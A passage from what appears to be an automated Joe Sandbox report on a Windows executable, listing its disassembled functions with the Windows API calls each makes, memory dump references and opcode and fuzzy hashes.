                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 1452418845-0
                                      • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                      • Instruction ID: d7ef9af30ee8b9c519fee11a7bd79d6913394a6462b48280ec1ffaac1d06ccd4
                                      • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                      • Instruction Fuzzy Hash: 0E315021E0F60746FA54ABA5D5113BA1791AF8138CF5C44F4E96EFB2E7DE2CB5098201
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A363644 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2359106489-0
                                      • Opcode ID: 2f23f07ec0997a12744607595347009f8296f9e9ca2e1c038d0e8349dad5b5fd
                                      • Instruction ID: 83992dcf34faf0f5f31313ba4ae9d414fa8bc07055c56693b6cb90149278f129
                                      • Opcode Fuzzy Hash: 2f23f07ec0997a12744607595347009f8296f9e9ca2e1c038d0e8349dad5b5fd
                                      • Instruction Fuzzy Hash: 1C31D322E0C78381EA649F29A5852BD6361FF897E8F580271EE9DE37D5DF3CD4418600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3622E0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                      • Instruction ID: a42ffeee8ace5b841a8b8418c8d8faf32e8fda424e364ed4d09ef4d4e3c32ee1
                                      • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                      • Instruction Fuzzy Hash: 9B218121E0CA5285EB609FA1A40033DA7A0FF45B9CF2D41B1EA9DEB794DF3CE8558741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36E8C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A36EC58: ResetEvent.KERNEL32 ref: 00007FF65A36EC71
                                        • Part of subcall function 00007FF65A36EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF65A36EC87
                                      • ReleaseSemaphore.KERNEL32 ref: 00007FF65A36E8F0
                                      • FindCloseChangeNotification.KERNELBASE ref: 00007FF65A36E90F
                                      • DeleteCriticalSection.KERNEL32 ref: 00007FF65A36E926
                                      • CloseHandle.KERNEL32 ref: 00007FF65A36E933
                                        • Part of subcall function 00007FF65A36E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9DF
                                        • Part of subcall function 00007FF65A36E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 2143293610-0
                                      • Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                      • Instruction ID: 54ba38601817bd8216f6d06bf751112c61efae0bac03a98fab5318caa1400898
                                      • Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                      • Instruction Fuzzy Hash: E9014033A14A91A6E6489F21E6442ADA771FFC4B84F144071DB5EE3721CF39E4B8C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36EA20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority
                                      • String ID: CreateThread failed
                                      • API String ID: 2610526550-3849766595
                                      • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                      • Instruction ID: 98be541967887b2eb301a8822dda1d0d0f0d9f627323cd6c1817ab7f42f92dd2
                                      • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                      • Instruction Fuzzy Hash: 5D112B31A19A4686FA00DF14E8411A97361FF84798F5842B1DA4DE3669EF3CE98AC740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3793EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: DirectoryInitializeMallocSystem
                                      • String ID: riched20.dll
                                      • API String ID: 174490985-3360196438
                                      • Opcode ID: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                      • Instruction ID: f691ba79824897fcac9d998a4b590a207f3cf9a4791a8da7d42d69e1ca2a6cb6
                                      • Opcode Fuzzy Hash: c34aace14b4968e7e8138c84649bdfd409ced11a060b8a8d8367bbc56b2e4ded
                                      • Instruction Fuzzy Hash: E6F06271A18F4682EB409F64F4151AAB7A0FF88758F480275E58ED2764DF7CD14DCB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3708DC Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A3784BC: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF65A3784EC
                                        • Part of subcall function 00007FF65A36AAA0: LoadStringW.USER32 ref: 00007FF65A36AB27
                                        • Part of subcall function 00007FF65A36AAA0: LoadStringW.USER32 ref: 00007FF65A36AB40
                                        • Part of subcall function 00007FF65A351FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A351FFB
                                        • Part of subcall function 00007FF65A35129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65A351396
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A38013B
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A380141
                                      • SendDlgItemMessageW.USER32 ref: 00007FF65A380172
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                      • String ID:
                                      • API String ID: 3106221260-0
                                      • Opcode ID: 8a8df3dc892b91b579a0b075b1313b3b78b2533db13d3ecb135e739853f28001
                                      • Instruction ID: 64b7647086f4196d5fdd54efd03fcdaef97a694509e9383724e4a18768ba8d05
                                      • Opcode Fuzzy Hash: 8a8df3dc892b91b579a0b075b1313b3b78b2533db13d3ecb135e739853f28001
                                      • Instruction Fuzzy Hash: 9351B262F0564286FB10ABA5E4412FC2362AF89B9CF580276DE0DF77D6EE2CE541C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A351744 Relevance: 4.6, APIs: 3, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2371198981-0
                                      • Opcode ID: 7af7209a03675e02a4b704b17e606e53c044e410c4768cf86d51e40c4e993159
                                      • Instruction ID: ab204c7b9fc6aa505d215d4b24599dd541ff603be1392002ca92eb4ae19a2280
                                      • Opcode Fuzzy Hash: 7af7209a03675e02a4b704b17e606e53c044e410c4768cf86d51e40c4e993159
                                      • Instruction Fuzzy Hash: 73413521B0864681EA14EF5AE544279A391EF08BE8F584631DE7CD7BD5EF3CE095C304
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3620F4 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2272807158-0
                                      • Opcode ID: a0dc123f22a855cf25d97852fe41284ea3799d90fc4df8cd16141fb6b158bd92
                                      • Instruction ID: dea60fde6372e4f0bc94fd218c1a09304f367d126cd5549cd8bd7758a44d9e4b
                                      • Opcode Fuzzy Hash: a0dc123f22a855cf25d97852fe41284ea3799d90fc4df8cd16141fb6b158bd92
                                      • Instruction Fuzzy Hash: 3241B172A0878286EB248F65E44426967A1FF85BB8F184374DFAD97BD5CF3CE4908700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3523F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2176759853-0
                                      • Opcode ID: 276560ff51f44e2726fc42c2034d76ebac9f75443b4299cef8fd919ee51c8c72
                                      • Instruction ID: 7a6f330bfe6846763a1d628c0b6f6be94e51493a9d01326fc25df050c08a58f7
                                      • Opcode Fuzzy Hash: 276560ff51f44e2726fc42c2034d76ebac9f75443b4299cef8fd919ee51c8c72
                                      • Instruction Fuzzy Hash: 6721A462A19B8281EA149B69F44016A6361FF8DBD4F184235EF9D93B95DF3CD191C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A371F14 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1875163511-0
                                      • Opcode ID: db20e05753df598e894c5cc758c65fbe96d0cfc7e1b9329a64eb04cdedcb9e75
                                      • Instruction ID: 3e5110304131cdf58cc986051e38f28762dfa1af5d104b0e664d452e8adb93de
                                      • Opcode Fuzzy Hash: db20e05753df598e894c5cc758c65fbe96d0cfc7e1b9329a64eb04cdedcb9e75
                                      • Instruction Fuzzy Hash: 16317263A09A8691FB249B14E4443B963E0FF40B8CF5C0572D64DE66B5DF7CE656C301
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A363CF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: 7fdf0cd4e5230aa7621eabec0e784b37c7ed14eccba0dac1b5def99b4e7a5bba
                                      • Instruction ID: 971d819aba0383a9a29758239a579000c51bf1094e51c3d64d7006f288b3f5e8
                                      • Opcode Fuzzy Hash: 7fdf0cd4e5230aa7621eabec0e784b37c7ed14eccba0dac1b5def99b4e7a5bba
                                      • Instruction Fuzzy Hash: 5321D722B18B8282EE208F25E44526E6361FFC9B98F185270EE9ED3795DF3CD544C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36317C Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3118131910-0
                                      • Opcode ID: ce21ccb842952d462125c9b16cbb9ae1d7f1021018c759017b763d9352aedc07
                                      • Instruction ID: 8e2b496af40d849a22453500d5a583a0aeeb846057cadedd3619df98a0d69eda
                                      • Opcode Fuzzy Hash: ce21ccb842952d462125c9b16cbb9ae1d7f1021018c759017b763d9352aedc07
                                      • Instruction Fuzzy Hash: 9C21C532A1878282EA108F25F44526E7361FFC9B98F540270EAADE3B99DF3CD540C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36327C Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: a08150f23ae7dab96dd29fe21bc2aeddd134a8a0159e4438a73a447bedda0e2b
                                      • Instruction ID: a258215bd08a83cc5bf6fb155abea07442ca859bb89537e73f13c4df998eaaac
                                      • Opcode Fuzzy Hash: a08150f23ae7dab96dd29fe21bc2aeddd134a8a0159e4438a73a447bedda0e2b
                                      • Instruction Fuzzy Hash: 5F215332A1878282EE109F29F4451296361FFC9BA8F681271EAADD7BD9DF3CD541C704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38BEE4 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                      • Instruction ID: 14b4a367eafcfbb2bc618a4bfe7d863bc2cbd15e5572a357bafe4a90a5ed215c
                                      • Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                      • Instruction Fuzzy Hash: 61E04F24B0530746FB546F3199913792362AFC8749F0844B9D80EE3396CE3DA40A8B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35F588 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                      Download Yara Rule
                                      APIs
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35F8A5
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35F8AB
                                        • Part of subcall function 00007FF65A363E88: FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                      • String ID:
                                      • API String ID: 3587649625-0
                                      • Opcode ID: e36c883a4f5a44fe44a2e8c509133dbe774585f7eed481499094dcfca338fab8
                                      • Instruction ID: c2731780e8207507595fdc6f5f23831fb89fc9ce45bb2d8583c9bcfc7dda9776
                                      • Opcode Fuzzy Hash: e36c883a4f5a44fe44a2e8c509133dbe774585f7eed481499094dcfca338fab8
                                      • Instruction Fuzzy Hash: 82919E33A18B8294EB10DF68D4402AD6761FF8879CF584276EA5CE7AE9DF78D585C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A353904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
